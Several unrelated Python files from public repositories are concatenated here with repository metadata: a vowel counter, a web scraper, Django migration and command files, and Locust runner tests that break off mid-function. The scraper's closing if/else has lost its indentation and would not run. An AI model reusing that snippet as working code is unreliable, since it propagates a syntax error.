os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'capture.settings')
application = get_asgi_application()
| [
"sajib1066@gmail.com"
] | sajib1066@gmail.com |
f4434d0474136df5cbcc1a860c3ed344ae31b615 | ee369616696694bd952e9271c9734dacb3955407 | /counting vowels in strings.py | 13ba9df1dd380aec28aae32721e6577ae8ac1d5b | [] | no_license | Shankar1528/Summer-Internship | a77efb614f3b4f77870f0f0ae46cf5162553dd1b | a844bb7612d28356b82759cdf1b83843811fae33 | refs/heads/master | 2022-10-24T13:35:34.864709 | 2020-06-17T07:38:11 | 2020-06-17T07:38:11 | 265,574,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | def vowel_count(str):
    # Running total of vowel characters seen so far.
    count = 0
    # Membership set covering both lower- and upper-case vowels.
    vowel = set("aeiouAEIOU")
    for alphabet in str:
        if alphabet in vowel:
            count = count + 1
    # Prints the result rather than returning it.
    print("No. of vowels :", count)
str = "GeeksforGeeks"
vowel_count(str)
| [
"noreply@github.com"
] | Shankar1528.noreply@github.com |
683dc7de73c620ecfe6cdae4bc85ed8c09f792b5 | 9fd876c0e04c58312d9a528df5f815128f3711be | /test/1_scrap_beauti_err1.py | 13d76cb4f2519cfe9cfbf0ca1873e28d8bfe15c7 | [] | no_license | Felixsh19/python_datamining | 2c9b6fa7f5f07faa04d02d644569d8c14c11601f | 12b76beb2115425e9c4983c36c1d089c0e9b3299 | refs/heads/master | 2021-01-20T14:24:00.288359 | 2017-06-03T12:57:41 | 2017-06-03T12:57:41 | 90,606,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | #网页可能不存在及服务器错误的情况
from urllib.request import urlopen
from urllib.error import HTTPError,URLError
from bs4 import BeautifulSoup
def getTitle(url):  # catch exceptions around fetch and parse
    """Fetch *url* and return the first <h1> inside <body>, or None.

    None is returned when the request fails (HTTPError/URLError) or when
    the parsed page has no <body> (AttributeError while traversing).
    """
    try:
        html = urlopen(url)
    except (HTTPError, URLError):
        # Page may not exist, or the server returned an error.
        return None
    try:
        # Explicit parser: without it bs4 guesses per environment and
        # emits GuessedAtParserWarning.
        bs0bj = BeautifulSoup(html.read(), 'html.parser')
        title = bs0bj.body.h1
    except AttributeError:
        return None
    return title
title = getTitle("http://www.pythonscraping.com/pages/page1.html")
if title == None:
print("page failed")
else:
print(title) | [
"noreply@github.com"
] | Felixsh19.noreply@github.com |
ac40d8d902f38f23ede1851f3b163c1ed72c880c | 2ebd8275f377e9993b69b10f2ccf3953bde3eeb8 | /genertic/recommendation/migrations/0008_populations_user.py | b7e2147b1c890c4ec220b9396f4f2a2ae51742cd | [] | no_license | Earnn/Recommendation-System | d5c614d316fb38a500723e8e7d6864fb0130efc4 | 59d32673db29091935d91c64c4ff021317d4947a | refs/heads/master | 2021-05-11T00:55:13.336966 | 2018-03-21T10:48:37 | 2018-03-21T10:48:37 | 118,313,960 | 0 | 1 | null | 2018-03-21T09:40:34 | 2018-01-21T07:29:10 | CSS | UTF-8 | Python | false | false | 611 | py | # Generated by Django 2.0.2 on 2018-03-06 16:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration for the `recommendation` app.

    Adds a nullable ``user`` foreign key (to the project's swappable user
    model) on the ``populations`` model.
    """
    dependencies = [
        # Must run after the user model exists and after the previous
        # recommendation migration.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('recommendation', '0007_auto_20180306_2323'),
    ]
    operations = [
        migrations.AddField(
            model_name='populations',
            name='user',
            # SET_NULL: deleting the user keeps the row, clearing the link.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"akanip2@gmail.com"
] | akanip2@gmail.com |
4a37049bdd2a5eb1ab32b0f6c0feabcf07e1d909 | 0bc9bff4fd4bd72b0ad681b79f0e39cdb9fc9dc0 | /voximplant/management/commands/vox_call_list_download.py | 7ea6954170db7d549c13f6340aae7c904ee5af68 | [
"MIT"
] | permissive | telminov/django-voximplant | bc4fcb53147d9a318857b8213934217ebfc8fdef | a0165498d1727039e26f77724079033c252a3611 | refs/heads/master | 2020-05-22T01:16:43.631059 | 2017-09-13T04:41:47 | 2017-09-13T04:41:47 | 58,752,532 | 4 | 2 | null | 2017-09-13T04:41:48 | 2016-05-13T15:39:03 | Python | UTF-8 | Python | false | false | 395 | py | # coding: utf-8
from django.core.management.base import BaseCommand
from ... import tools
class Command(BaseCommand):
    """Management command that downloads the detail of one call list."""
    help = 'Get call list detail'

    def add_arguments(self, parser):
        # --id selects which call list to fetch.
        parser.add_argument('--id', dest='call_list_id', type=int)

    def handle(self, *args, **options):
        tools.call_list_download(options['call_list_id'])
| [
"sergey@telminov.ru"
] | sergey@telminov.ru |
1818596c5ad8da3b50be846123ee1b1a949d7e0b | 6d86315ee2383e768ff6856b06271fcc116f5e1f | /tests/.locust/lib/python3.8/site-packages/locust/test/test_runners.py | d5b6ae3dba457863c37d9884fc0493a149a92020 | [
"MIT"
] | permissive | iDataist/Deploy-a-Flask-Machine-Learning-App-to-Azure-App-Services-with-a-CI-CD-Pipeline | 8663e4100f7890fcc9cd98e11fdfb86221f1be61 | adc580eebc0f1064a7b1fb23d150a2c6cd7a71ea | refs/heads/main | 2023-06-14T04:20:57.497234 | 2021-07-12T15:50:21 | 2021-07-12T15:50:21 | 363,522,798 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 64,875 | py | import mock
import unittest
import gevent
from gevent import sleep
from gevent.queue import Queue
import greenlet
import locust
from locust import runners, constant, LoadTestShape
from locust.main import create_environment
from locust.user import User, TaskSet, task
from locust.env import Environment
from locust.exception import RPCError, StopUser
from locust.rpc import Message
from locust.runners import (
LocalRunner,
WorkerNode,
WorkerRunner,
STATE_INIT,
STATE_SPAWNING,
STATE_RUNNING,
STATE_MISSING,
STATE_STOPPING,
STATE_STOPPED,
)
from locust.stats import RequestStats
from locust.test.testcases import LocustTestCase
NETWORK_BROKEN = "network broken"
def mocked_rpc():
    """Return a mock RPC server/client class backed by an in-process queue.

    The class-level ``queue`` simulates the inbound wire: tests push serialized
    messages with ``mocked_send`` and the runner under test consumes them via
    ``recv``/``recv_from_client``. Outgoing messages are captured in ``outbox``
    instead of touching the network. A message whose data equals NETWORK_BROKEN
    makes the receiving side raise RPCError, simulating a broken connection.
    """
    class MockedRpcServerClient:
        queue = Queue()
        outbox = []
        def __init__(self, *args, **kwargs):
            pass
        @classmethod
        def mocked_send(cls, message):
            # Serialize like the real transport, then yield control so the
            # runner greenlet can pick the message up immediately.
            cls.queue.put(message.serialize())
            sleep(0)
        def recv(self):
            results = self.queue.get()
            msg = Message.unserialize(results)
            # Sentinel payload simulates a network failure on receive.
            if msg.data == NETWORK_BROKEN:
                raise RPCError()
            return msg
        def send(self, message):
            self.outbox.append(message)
        def send_to_client(self, message):
            # Master-side send: remember which worker the message targeted.
            self.outbox.append((message.node_id, message))
        def recv_from_client(self):
            results = self.queue.get()
            msg = Message.unserialize(results)
            if msg.data == NETWORK_BROKEN:
                raise RPCError()
            return msg.node_id, msg
        def close(self):
            # Simulate an unclean shutdown: close() always raises.
            raise RPCError()
    return MockedRpcServerClient
class mocked_options:
    """Minimal stand-in for the parsed command-line options the runners read."""

    def __init__(self):
        # Defaults mirroring a typical local + distributed configuration.
        for attr, value in (
            ("spawn_rate", 5),
            ("num_users", 5),
            ("host", "/"),
            ("tags", None),
            ("exclude_tags", None),
            ("master_host", "localhost"),
            ("master_port", 5557),
            ("master_bind_host", "*"),
            ("master_bind_port", 5557),
            ("heartbeat_liveness", 3),
            ("heartbeat_interval", 1),
            ("stop_timeout", None),
            ("connection_broken", False),
        ):
            setattr(self, attr, value)

    def reset_stats(self):
        """No-op stub; nothing to reset here."""
class HeyAnException(Exception):
    """Marker exception raised on purpose inside test users/tasks."""
class TestLocustRunner(LocustTestCase):
def assert_locust_class_distribution(self, expected_distribution, classes):
# Construct a {UserClass => count} dict from a list of user classes
distribution = {}
for user_class in classes:
if not user_class in distribution:
distribution[user_class] = 0
distribution[user_class] += 1
expected_str = str({k.__name__: v for k, v in expected_distribution.items()})
actual_str = str({k.__name__: v for k, v in distribution.items()})
self.assertEqual(
expected_distribution,
distribution,
"Expected a User class distribution of %s but found %s"
% (
expected_str,
actual_str,
),
)
    def test_cpu_warning(self):
        """A busy-looping user should trip the runner's CPU-usage warning."""
        _monitor_interval = runners.CPU_MONITOR_INTERVAL
        # Shorten the monitor interval so the warning can fire within the test.
        runners.CPU_MONITOR_INTERVAL = 2.0
        try:
            class CpuUser(User):
                wait_time = constant(0.001)
                @task
                def cpu_task(self):
                    # burn CPU so the monitor sees high usage
                    for i in range(1000000):
                        _ = 3 / 2
            environment = Environment(user_classes=[CpuUser])
            runner = LocalRunner(environment)
            self.assertFalse(runner.cpu_warning_emitted)
            runner.spawn_users(1, 1, wait=False)
            sleep(2.5)
            runner.quit()
            self.assertTrue(runner.cpu_warning_emitted)
        finally:
            # Always restore the module-level interval for other tests.
            runners.CPU_MONITOR_INTERVAL = _monitor_interval
    def test_weight_locusts(self):
        """weight_users distributes users proportionally to class weights."""
        class BaseUser(User):
            pass
        class L1(BaseUser):
            weight = 101
        class L2(BaseUser):
            weight = 99
        class L3(BaseUser):
            weight = 100
        runner = Environment(user_classes=[L1, L2, L3]).create_local_runner()
        # 29/30/31 users over weights 101:99:100 — rounding must still sum correctly
        self.assert_locust_class_distribution({L1: 10, L2: 9, L3: 10}, runner.weight_users(29))
        self.assert_locust_class_distribution({L1: 10, L2: 10, L3: 10}, runner.weight_users(30))
        self.assert_locust_class_distribution({L1: 11, L2: 10, L3: 10}, runner.weight_users(31))
    def test_weight_locusts_fewer_amount_than_user_classes(self):
        """Requesting fewer users than classes yields exactly that many users."""
        class BaseUser(User):
            pass
        class L1(BaseUser):
            weight = 101
        class L2(BaseUser):
            weight = 99
        class L3(BaseUser):
            weight = 100
        runner = Environment(user_classes=[L1, L2, L3]).create_local_runner()
        self.assertEqual(1, len(runner.weight_users(1)))
        # the single user comes from L1 (the heaviest class)
        self.assert_locust_class_distribution({L1: 1}, runner.weight_users(1))
    def test_kill_locusts(self):
        """stop_users removes all user greenlets and kills them."""
        triggered = [False]
        class BaseUser(User):
            wait_time = constant(1)
            @task
            class task_set(TaskSet):
                @task
                def trigger(self):
                    triggered[0] = True
        runner = Environment(user_classes=[BaseUser]).create_local_runner()
        runner.spawn_users(2, spawn_rate=2, wait=False)
        self.assertEqual(2, len(runner.user_greenlets))
        g1 = list(runner.user_greenlets)[0]
        g2 = list(runner.user_greenlets)[1]
        runner.stop_users(2)
        self.assertEqual(0, len(runner.user_greenlets))
        self.assertTrue(g1.dead)
        self.assertTrue(g2.dead)
        # the task ran at least once before the users were stopped
        self.assertTrue(triggered[0])
    def test_start_event(self):
        """test_start fires exactly once and users run their tasks after start()."""
        class MyUser(User):
            wait_time = constant(1)
            task_run_count = 0
            @task
            def my_task(self):
                MyUser.task_run_count += 1
        test_start_run = [0]
        environment = Environment(user_classes=[MyUser])
        def on_test_start(*args, **kwargs):
            test_start_run[0] += 1
        environment.events.test_start.add_listener(on_test_start)
        runner = LocalRunner(environment)
        runner.start(user_count=3, spawn_rate=3, wait=False)
        # block until spawning finished (or fail after 3s)
        runner.spawning_greenlet.get(timeout=3)
        self.assertEqual(1, test_start_run[0])
        self.assertEqual(3, MyUser.task_run_count)
def test_stop_event(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[User])
def on_test_stop(*args, **kwargs):
test_stop_run[0] += 1
environment.events.test_stop.add_listener(on_test_stop)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.stop()
self.assertEqual(1, test_stop_run[0])
def test_stop_event_quit(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
test_stop_run = [0]
environment = Environment(user_classes=[User])
def on_test_stop(*args, **kwargs):
test_stop_run[0] += 1
environment.events.test_stop.add_listener(on_test_stop)
runner = LocalRunner(environment)
runner.start(user_count=3, spawn_rate=3, wait=False)
self.assertEqual(0, test_stop_run[0])
runner.quit()
self.assertEqual(1, test_stop_run[0])
    def test_stop_event_stop_and_quit(self):
        """test_stop fires only once even when stop() is followed by quit()."""
        class MyUser(User):
            wait_time = constant(1)
            @task
            def my_task(self):
                pass
        test_stop_run = [0]
        environment = Environment(user_classes=[MyUser])
        def on_test_stop(*args, **kwargs):
            test_stop_run[0] += 1
        environment.events.test_stop.add_listener(on_test_stop)
        runner = LocalRunner(environment)
        runner.start(user_count=3, spawn_rate=3, wait=False)
        self.assertEqual(0, test_stop_run[0])
        runner.stop()
        runner.quit()
        self.assertEqual(1, test_stop_run[0])
    def test_change_user_count_during_spawning(self):
        """Calling start() again mid-ramp re-targets the total user count."""
        class MyUser(User):
            wait_time = constant(1)
            @task
            def my_task(self):
                pass
        environment = Environment(user_classes=[MyUser])
        runner = LocalRunner(environment)
        runner.start(user_count=10, spawn_rate=5, wait=False)
        # interrupt the 10-user ramp-up partway through
        sleep(0.6)
        runner.start(user_count=5, spawn_rate=5, wait=False)
        runner.spawning_greenlet.join()
        self.assertEqual(5, len(runner.user_greenlets))
        runner.quit()
    def test_reset_stats(self):
        """With reset_stats=True, stats gathered during ramp-up are discarded."""
        class MyUser(User):
            @task
            class task_set(TaskSet):
                @task
                def my_task(self):
                    self.user.environment.events.request.fire(
                        request_type="GET",
                        name="/test",
                        response_time=666,
                        response_length=1337,
                        exception=None,
                        context={},
                    )
                    sleep(2)
        environment = Environment(user_classes=[MyUser], reset_stats=True)
        runner = LocalRunner(environment)
        runner.start(user_count=6, spawn_rate=12, wait=False)
        sleep(0.25)
        # requests were logged during ramp-up ...
        self.assertGreaterEqual(runner.stats.get("/test", "GET").num_requests, 3)
        sleep(0.3)
        # ... but the stats were reset once spawning completed
        self.assertLessEqual(runner.stats.get("/test", "GET").num_requests, 1)
        runner.quit()
    def test_no_reset_stats(self):
        """With reset_stats=False, stats gathered during ramp-up are kept."""
        class MyUser(User):
            @task
            class task_set(TaskSet):
                @task
                def my_task(self):
                    self.user.environment.events.request.fire(
                        request_type="GET",
                        name="/test",
                        response_time=666,
                        response_length=1337,
                        exception=None,
                        context={},
                    )
                    sleep(2)
        environment = Environment(reset_stats=False, user_classes=[MyUser])
        runner = LocalRunner(environment)
        runner.start(user_count=6, spawn_rate=12, wait=False)
        sleep(0.25)
        self.assertGreaterEqual(runner.stats.get("/test", "GET").num_requests, 3)
        sleep(0.3)
        # all 6 ramp-up requests survive the end of spawning
        self.assertEqual(6, runner.stats.get("/test", "GET").num_requests)
        runner.quit()
    def test_runner_reference_on_environment(self):
        """Environment and runner hold mutual references after creation."""
        env = Environment()
        runner = env.create_local_runner()
        self.assertEqual(env, runner.environment)
        self.assertEqual(runner, env.runner)
    def test_users_can_call_runner_quit_without_deadlocking(self):
        """A user calling runner.quit() from its own task must not deadlock."""
        class BaseUser(User):
            stop_triggered = False
            @task
            def trigger(self):
                self.environment.runner.quit()
            def on_stop(self):
                BaseUser.stop_triggered = True
        runner = Environment(user_classes=[BaseUser]).create_local_runner()
        runner.spawn_users(1, 1, wait=False)
        # bound the join — a deadlock would otherwise hang the test suite
        timeout = gevent.Timeout(0.5)
        timeout.start()
        try:
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception, runner must have hung somehow.")
        finally:
            timeout.cancel()
        self.assertTrue(BaseUser.stop_triggered)
    def test_runner_quit_can_run_on_stop_for_multiple_users_concurrently(self):
        """quit() runs all users' on_stop hooks concurrently (10 x 0.1s < 0.3s)."""
        class BaseUser(User):
            stop_count = 0
            @task
            def trigger(self):
                pass
            def on_stop(self):
                gevent.sleep(0.1)
                BaseUser.stop_count += 1
        runner = Environment(user_classes=[BaseUser]).create_local_runner()
        runner.spawn_users(10, 10, wait=False)
        # if on_stop ran serially this would take ~1s and trip the timeout
        timeout = gevent.Timeout(0.3)
        timeout.start()
        try:
            runner.quit()
        except gevent.Timeout:
            self.fail("Got Timeout exception, runner must have hung somehow.")
        finally:
            timeout.cancel()
        self.assertEqual(10, BaseUser.stop_count)  # verify that all users executed on_stop
def test_stop_users_with_spawn_rate(self):
class MyUser(User):
wait_time = constant(1)
@task
def my_task(self):
pass
environment = Environment(user_classes=[MyUser])
runner = LocalRunner(environment)
# Start load test, wait for users to start, then trigger ramp down
runner.start(10, 10, wait=False)
sleep(1)
runner.start(2, 4, wait=False)
# Wait a moment and then ensure the user count has started to drop but
# not immediately to user_count
sleep(1)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count > 5, "User count has decreased too quickly: %i" % user_count)
self.assertTrue(user_count < 10, "User count has not decreased at all: %i" % user_count)
# Wait and ensure load test users eventually dropped to desired count
sleep(2)
user_count = len(runner.user_greenlets)
self.assertTrue(user_count == 2, "User count has not decreased correctly to 2, it is : %i" % user_count)
class TestMasterWorkerRunners(LocustTestCase):
    def test_distributed_integration_run(self):
        """
        Full integration test that starts both a MasterRunner and three WorkerRunner instances
        and makes sure that their stats is sent to the Master.
        """
        class TestUser(User):
            wait_time = constant(0.1)
            @task
            def incr_stats(l):
                l.environment.events.request.fire(
                    request_type="GET",
                    name="/",
                    response_time=1337,
                    response_length=666,
                    exception=None,
                    context={},
                )
        with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
            # start a Master runner
            master_env = Environment(user_classes=[TestUser])
            master = master_env.create_master_runner("*", 0)
            sleep(0)
            # start 3 Worker runners
            workers = []
            for i in range(3):
                worker_env = Environment(user_classes=[TestUser])
                worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
                workers.append(worker)
            # give workers time to connect
            sleep(0.1)
            # issue start command that should trigger TestUsers to be spawned in the Workers
            master.start(6, spawn_rate=1000)
            sleep(0.1)
            # check that worker nodes have started locusts (6 users over 3 workers)
            for worker in workers:
                self.assertEqual(2, worker.user_count)
            # give time for users to generate stats, and stats to be sent to master
            sleep(1)
            master.quit()
            # make sure users are killed
            for worker in workers:
                self.assertEqual(0, worker.user_count)
        # check that stats are present in master
        self.assertGreater(
            master_env.runner.stats.total.num_requests,
            20,
            "For some reason the master node's stats has not come in",
        )
    def test_test_stop_event(self):
        """test_stop fires on the master, not on workers, when the master quits."""
        class TestUser(User):
            wait_time = constant(0.1)
            @task
            def my_task(l):
                pass
        with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
            # start a Master runner
            master_env = Environment(user_classes=[TestUser])
            test_stop_count = {"master": 0, "worker": 0}
            @master_env.events.test_stop.add_listener
            def _(*args, **kwargs):
                test_stop_count["master"] += 1
            master = master_env.create_master_runner("*", 0)
            sleep(0)
            # start a Worker runner
            worker_env = Environment(user_classes=[TestUser])
            @worker_env.events.test_stop.add_listener
            def _(*args, **kwargs):
                test_stop_count["worker"] += 1
            worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
            # give worker time to connect
            sleep(0.1)
            # issue start command that should trigger TestUsers to be spawned in the Workers
            master.start(2, spawn_rate=1000)
            sleep(0.1)
            # check that worker nodes have started locusts
            self.assertEqual(2, worker.user_count)
            # give time for users to generate stats, and stats to be sent to master
            sleep(0.1)
            master_env.events.quitting.fire(environment=master_env, reverse=True)
            master.quit()
            sleep(0.1)
            # make sure users are killed
            self.assertEqual(0, worker.user_count)
        # check the test_stop event was called one time in master and zero times in worker
        self.assertEqual(
            1,
            test_stop_count["master"],
            "The test_stop event was not called exactly one time in the master node",
        )
        self.assertEqual(
            0,
            test_stop_count["worker"],
            "The test_stop event was called in the worker node",
        )
    def test_distributed_shape(self):
        """
        Full integration test that starts both a MasterRunner and three WorkerRunner instances
        and tests a basic LoadTestShape with scaling up and down users
        """
        class TestUser(User):
            @task
            def my_task(self):
                pass
        class TestShape(LoadTestShape):
            def tick(self):
                # three stages: 9 users, 21 users, 3 users, then stop (None)
                run_time = self.get_run_time()
                if run_time < 2:
                    return (9, 9)
                elif run_time < 4:
                    return (21, 21)
                elif run_time < 6:
                    return (3, 21)
                else:
                    return None
        with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
            test_shape = TestShape()
            master_env = Environment(user_classes=[TestUser], shape_class=test_shape)
            master_env.shape_class.reset_time()
            master = master_env.create_master_runner("*", 0)
            workers = []
            for i in range(3):
                worker_env = Environment(user_classes=[TestUser])
                worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
                workers.append(worker)
            # Give workers time to connect
            sleep(0.1)
            # Start a shape test
            master.start_shape()
            sleep(1)
            # Ensure workers have connected and started the correct amount of users
            for worker in workers:
                self.assertEqual(3, worker.user_count, "Shape test has not reached stage 1")
            self.assertEqual(
                9, test_shape.get_current_user_count(), "Shape is not seeing stage 1 runner user count correctly"
            )
            # Ensure new stage with more users has been reached
            sleep(2)
            for worker in workers:
                self.assertEqual(7, worker.user_count, "Shape test has not reached stage 2")
            self.assertEqual(
                21, test_shape.get_current_user_count(), "Shape is not seeing stage 2 runner user count correctly"
            )
            # Ensure new stage with less users has been reached
            sleep(2)
            for worker in workers:
                self.assertEqual(1, worker.user_count, "Shape test has not reached stage 3")
            self.assertEqual(
                3, test_shape.get_current_user_count(), "Shape is not seeing stage 3 runner user count correctly"
            )
            # Ensure test stops at the end
            sleep(2)
            for worker in workers:
                self.assertEqual(0, worker.user_count, "Shape test has not stopped")
            self.assertEqual(
                0, test_shape.get_current_user_count(), "Shape is not seeing stopped runner user count correctly"
            )
    def test_distributed_shape_stop_and_restart(self):
        """
        Test stopping and then restarting a LoadTestShape
        """
        class TestUser(User):
            @task
            def my_task(self):
                pass
        class TestShape(LoadTestShape):
            def tick(self):
                # constant 4 users for 10s, then stop
                run_time = self.get_run_time()
                if run_time < 10:
                    return (4, 4)
                else:
                    return None
        with mock.patch("locust.runners.WORKER_REPORT_INTERVAL", new=0.3):
            master_env = Environment(user_classes=[TestUser], shape_class=TestShape())
            master_env.shape_class.reset_time()
            master = master_env.create_master_runner("*", 0)
            workers = []
            for i in range(2):
                worker_env = Environment(user_classes=[TestUser])
                worker = worker_env.create_worker_runner("127.0.0.1", master.server.port)
                workers.append(worker)
            # Give workers time to connect
            sleep(0.1)
            # Start a shape test and ensure workers have connected and started the correct amount of users
            master.start_shape()
            sleep(1)
            for worker in workers:
                self.assertEqual(2, worker.user_count, "Shape test has not started correctly")
            # Stop the test and ensure all user count is 0
            master.stop()
            sleep(1)
            for worker in workers:
                self.assertEqual(0, worker.user_count, "Shape test has not stopped")
            # Then restart the test again and ensure workers have connected and started the correct amount of users
            master.start_shape()
            sleep(1)
            for worker in workers:
                self.assertEqual(2, worker.user_count, "Shape test has not started again correctly")
            master.stop()
class TestMasterRunner(LocustTestCase):
    def setUp(self):
        super().setUp()
        # Fresh Environment per test; catch_exceptions=False lets failures surface.
        self.environment = Environment(events=locust.events, catch_exceptions=False)
    def tearDown(self):
        # No extra teardown beyond the base class.
        super().tearDown()
    def get_runner(self):
        """Create a MasterRunner bound to all interfaces on port 5557."""
        return self.environment.create_master_runner("*", 5557)
    def test_worker_connect(self):
        """client_ready messages register workers; 'quit' removes them."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "zeh_fake_client1"))
            self.assertEqual(1, len(master.clients))
            self.assertTrue(
                "zeh_fake_client1" in master.clients, "Could not find fake client in master instance's clients dict"
            )
            server.mocked_send(Message("client_ready", None, "zeh_fake_client2"))
            server.mocked_send(Message("client_ready", None, "zeh_fake_client3"))
            server.mocked_send(Message("client_ready", None, "zeh_fake_client4"))
            self.assertEqual(4, len(master.clients))
            server.mocked_send(Message("quit", None, "zeh_fake_client3"))
            self.assertEqual(3, len(master.clients))
    def test_worker_stats_report_median(self):
        """Stats reported by a worker feed the master's median calculation."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "fake_client"))
            master.stats.get("/", "GET").log(100, 23455)
            master.stats.get("/", "GET").log(800, 23455)
            master.stats.get("/", "GET").log(700, 23455)
            data = {"user_count": 1}
            # let listeners serialize the local stats into the report payload,
            # then clear so the master's totals come only from the message
            self.environment.events.report_to_master.fire(client_id="fake_client", data=data)
            master.stats.clear_all()
            server.mocked_send(Message("stats", data, "fake_client"))
            s = master.stats.get("/", "GET")
            self.assertEqual(700, s.median_response_time)
    def test_worker_stats_report_with_none_response_times(self):
        """None response times are excluded from median/avg aggregation."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "fake_client"))
            master.stats.get("/mixed", "GET").log(0, 23455)
            master.stats.get("/mixed", "GET").log(800, 23455)
            master.stats.get("/mixed", "GET").log(700, 23455)
            master.stats.get("/mixed", "GET").log(None, 23455)
            master.stats.get("/mixed", "GET").log(None, 23455)
            master.stats.get("/mixed", "GET").log(None, 23455)
            master.stats.get("/mixed", "GET").log(None, 23455)
            master.stats.get("/onlyNone", "GET").log(None, 23455)
            data = {"user_count": 1}
            self.environment.events.report_to_master.fire(client_id="fake_client", data=data)
            master.stats.clear_all()
            server.mocked_send(Message("stats", data, "fake_client"))
            # numeric samples [0, 800, 700] dominate; Nones don't skew the result
            s1 = master.stats.get("/mixed", "GET")
            self.assertEqual(700, s1.median_response_time)
            self.assertEqual(500, s1.avg_response_time)
            # an entry with only None samples reports zeros
            s2 = master.stats.get("/onlyNone", "GET")
            self.assertEqual(0, s2.median_response_time)
            self.assertEqual(0, s2.avg_response_time)
def test_master_marks_downed_workers_as_missing(self):
with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
master = self.get_runner()
server.mocked_send(Message("client_ready", None, "fake_client"))
sleep(6)
# print(master.clients['fake_client'].__dict__)
assert master.clients["fake_client"].state == STATE_MISSING
    def test_last_worker_quitting_stops_test(self):
        """The test stops only after the last connected worker quits."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "fake_client1"))
            server.mocked_send(Message("client_ready", None, "fake_client2"))
            master.start(1, 2)
            server.mocked_send(Message("spawning", None, "fake_client1"))
            server.mocked_send(Message("spawning", None, "fake_client2"))
            server.mocked_send(Message("quit", None, "fake_client1"))
            sleep(0)
            self.assertEqual(1, len(master.clients.all))
            self.assertNotEqual(STATE_STOPPED, master.state, "Not all workers quit but test stopped anyway.")
            server.mocked_send(Message("quit", None, "fake_client2"))
            sleep(0)
            self.assertEqual(0, len(master.clients.all))
            self.assertEqual(STATE_STOPPED, master.state, "All workers quit but test didn't stop.")
    @mock.patch("locust.runners.HEARTBEAT_INTERVAL", new=0.1)
    def test_last_worker_missing_stops_test(self):
        """When every worker misses its heartbeats, the master stops the test."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "fake_client1"))
            server.mocked_send(Message("client_ready", None, "fake_client2"))
            server.mocked_send(Message("client_ready", None, "fake_client3"))
            master.start(3, 3)
            server.mocked_send(Message("spawning", None, "fake_client1"))
            server.mocked_send(Message("spawning", None, "fake_client2"))
            server.mocked_send(Message("spawning", None, "fake_client3"))
            sleep(0.2)
            server.mocked_send(
                Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client1")
            )
            server.mocked_send(
                Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client2")
            )
            server.mocked_send(
                Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client3")
            )
            sleep(0.2)
            self.assertEqual(0, len(master.clients.missing))
            self.assertEqual(3, master.worker_count)
            self.assertNotIn(
                master.state, [STATE_STOPPED, STATE_STOPPING], "Not all workers went missing but test stopped anyway."
            )
            # only client1 keeps heartbeating; clients 2 and 3 should go missing first
            server.mocked_send(
                Message("heartbeat", {"state": STATE_RUNNING, "current_cpu_usage": 50, "count": 1}, "fake_client1")
            )
            sleep(0.4)
            self.assertEqual(2, len(master.clients.missing))
            self.assertEqual(1, master.worker_count)
            self.assertNotIn(
                master.state, [STATE_STOPPED, STATE_STOPPING], "Not all workers went missing but test stopped anyway."
            )
            sleep(0.2)
            self.assertEqual(3, len(master.clients.missing))
            self.assertEqual(0, master.worker_count)
            self.assertEqual(STATE_STOPPED, master.state, "All workers went missing but test didn't stop.")
    def test_master_total_stats(self):
        """Aggregated stats from multiple worker reports produce correct totals."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "fake_client"))
            stats = RequestStats()
            stats.log_request("GET", "/1", 100, 3546)
            stats.log_request("GET", "/1", 800, 56743)
            stats2 = RequestStats()
            stats2.log_request("GET", "/2", 700, 2201)
            server.mocked_send(
                Message(
                    "stats",
                    {
                        "stats": stats.serialize_stats(),
                        "stats_total": stats.total.serialize(),
                        "errors": stats.serialize_errors(),
                        "user_count": 1,
                    },
                    "fake_client",
                )
            )
            server.mocked_send(
                Message(
                    "stats",
                    {
                        "stats": stats2.serialize_stats(),
                        "stats_total": stats2.total.serialize(),
                        "errors": stats2.serialize_errors(),
                        "user_count": 2,
                    },
                    "fake_client",
                )
            )
            # median over the combined samples [100, 800, 700] is 700
            self.assertEqual(700, master.stats.total.median_response_time)
    def test_master_total_stats_with_none_response_times(self):
        """None response times in worker reports must not skew the master's totals."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
